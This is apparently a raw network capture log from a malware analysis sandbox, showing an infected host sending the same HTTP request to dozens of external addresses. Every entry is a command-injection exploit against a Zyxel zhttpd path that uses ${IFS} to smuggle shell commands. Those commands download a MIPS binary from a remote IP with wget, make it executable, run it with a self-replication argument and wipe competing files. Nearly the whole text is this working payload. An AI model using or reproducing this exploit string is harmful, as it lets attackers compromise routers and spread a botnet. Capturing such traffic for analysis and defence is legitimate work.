                                          Jan 14, 2024 15:46:35.431163073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8993192.168.2.2334142155.129.177.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431207895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8994192.168.2.235903453.173.8.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431236029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8995192.168.2.2354100216.174.163.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431282043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8996192.168.2.234758277.68.104.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431303978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8997192.168.2.2354538207.234.108.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431343079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8998192.168.2.233827682.165.158.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431375027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8999192.168.2.2340254157.139.214.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431421995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9000192.168.2.2360944212.13.170.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431437016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9001192.168.2.2348544104.246.9.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431469917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9002192.168.2.2353682219.54.230.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431545973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9003192.168.2.2359732134.104.5.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431600094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9004192.168.2.2334700153.187.76.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431624889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9005192.168.2.235992871.234.241.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431679010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9006192.168.2.2351294142.177.46.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431726933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9007192.168.2.23586748.129.76.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431762934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9008192.168.2.233559465.213.255.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431787014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9009192.168.2.233723258.230.213.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431849957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9010192.168.2.2340276218.131.19.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431879044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9011192.168.2.2337606123.95.131.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431916952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9012192.168.2.2359682209.160.234.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.431965113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9013192.168.2.2348332223.248.105.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432014942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9014192.168.2.2360432192.49.51.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432069063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9015192.168.2.2355018150.5.238.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432106018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9016192.168.2.235537275.232.22.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432163954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9017192.168.2.2353970115.210.103.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432190895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9018192.168.2.233630434.172.202.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432243109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9019192.168.2.2342764185.167.88.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432288885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9020192.168.2.235573898.197.159.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432327032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9021192.168.2.2353510194.171.174.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432384014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9022192.168.2.2347844109.122.36.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432404995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9023192.168.2.2357520124.138.119.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432461023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9024192.168.2.235403488.255.32.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432504892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9025192.168.2.2347368115.109.145.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432549000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9026192.168.2.2359748144.125.3.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432591915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9027192.168.2.2347122109.103.0.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432627916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9028192.168.2.234815890.83.98.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432687044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9029192.168.2.235554618.230.42.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432739019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9030192.168.2.235159435.94.75.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432790995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9031192.168.2.233319027.108.109.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432823896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9032192.168.2.2338258208.143.173.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432852030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9033192.168.2.2344130181.110.98.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432910919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9034192.168.2.2342460107.0.176.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432936907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9035192.168.2.2340522196.191.106.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.432991982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9036192.168.2.2354546116.81.61.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433024883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9037192.168.2.2354416103.71.255.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433048964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9038192.168.2.234986853.132.108.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433106899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9039192.168.2.2359426152.156.212.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433124065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9040192.168.2.234103294.213.194.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433185101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9041192.168.2.2341108130.105.248.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433228970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9042192.168.2.235462654.169.45.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433264017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9043192.168.2.2351920157.97.10.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433310032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9044192.168.2.234701890.217.200.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433367968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9045192.168.2.2339720147.254.90.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433420897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9046192.168.2.2345432174.152.232.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433458090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9047192.168.2.2352924104.244.167.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433509111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9048192.168.2.2352980200.175.162.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433543921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9049192.168.2.235452643.161.162.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433599949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9050192.168.2.2341408145.207.168.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433641911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9051192.168.2.2338750192.252.88.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433703899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9052192.168.2.2356148147.227.129.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433720112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9053192.168.2.234294812.214.163.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433742046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9054192.168.2.234414653.134.83.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433804035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9055192.168.2.2348108157.149.172.69443
                                          TimestampBytes transferredDirectionData
